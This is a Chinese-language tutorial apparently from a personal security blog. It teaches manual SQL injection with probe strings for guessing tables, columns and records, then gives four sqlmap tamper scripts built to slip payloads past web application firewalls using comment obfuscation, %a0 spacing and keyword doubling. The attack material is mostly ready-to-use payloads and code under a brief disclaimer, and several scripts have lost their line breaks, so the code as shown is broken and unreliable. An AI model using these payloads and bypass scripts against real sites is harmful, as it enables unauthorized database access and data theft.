手工注入
基础
test: and 1 = 1, and 1 = 2
判断是否为sql
1。可以在id后面加一个',查看返回数据
2。and (select count(*) from sysobjects)>0
变量:and user>0 and database>0
sql注入分为数字型,字符型,搜索型
猜解表名
(Select Count(*) from 待猜表明)>=0
猜解列名
(Select Count(待猜列明) from 已知表名)>=0
猜解记录
and (Select Count(已知列名) from 已知表名)>n n为变量数字
..............................................
sqlmap绕过脚本
这里我直接上代码,懒得讲了。对了,别忘了创建一个__init__.py
#!/usr/bin/env python
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING__priority__ = PRIORITY.NORMAL
def dependencies():
passdef tamper(payload, **kwargs):
if payload:
payload = payload.replace("UNION","union/*!88888cas*/")
payload = payload.replace("--","/*!*/--")
payload = payload.replace("SELECT","/*!88888cas*/select")
payload = payload.replace("FROM","/*!99999c*//*!99999c*/from")
payload = payload.replace("#","/*!*/#")
payload = payload.replace("USER()","USER/*!()*/")
payload = payload.replace("DATABASE()","DATABASE/*!()*/")
payload = payload.replace(" ","/*!*/")
payload = payload.replace("=","/*!*/=/*!*/")
payload = payload.replace("AND","/*!*/AND/*!*/")return payload
就是替换,不要我多讲了吧
#!/usr/bin/env python
# -*- coding:UTF-8 -*-"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""from lib.core.compat import xrange
from lib.core.enums import PRIORITY__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, Falsefor i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
# 把原先的+改为%a0即可
retVal += "%a0"
continueelif payload[i] == '\'':
quote = not quoteelif payload[i] == '"':
doublequote = not doublequoteelif payload[i] == " " and not doublequote and not quote:
# 把原先的+改为%a0即可
retVal += "%a0"
continueretVal += payload[i]
return retVal
哈哈哈哈
#!/usr/bin/env python
# -*- coding:UTF-8 -*-"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入正则模块,用于字符的替换
import re
# sqlmap中lib\core\enums中的PRIORITY优先级函数
from lib.core.enums import PRIORITY
# 定义脚本优先级
__priority__ = PRIORITY.NORMAL# 脚本描述函数
def dependencies():
passdef tamper(payload, **kwargs):
# 将payload进行转存
retVal = payload
if payload:
# 使用re.sub函数不区分大小写替换and和or
# 替换为anandd和oorr
retVal = re.sub(r"(?i)(or)", r"oorr", retVal)
retVal = re.sub(r"(?i)(and)", r"anandd", retVal)
# 把最后修改好的payload返回
return retVal
轰轰轰
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
passdef tamper(payload, **kwargs):
retVal = payload
if payload:
# 把count(*)替换为count(1)
retVal = re.sub(r"(?i)count\(\*\)", r"count(1)", payload)return retVal
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。
不然你就会像我一样,,,,
哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
好了,今天就到这里,我是铁汉fhoenix。希望今天的内容对你有帮助,再见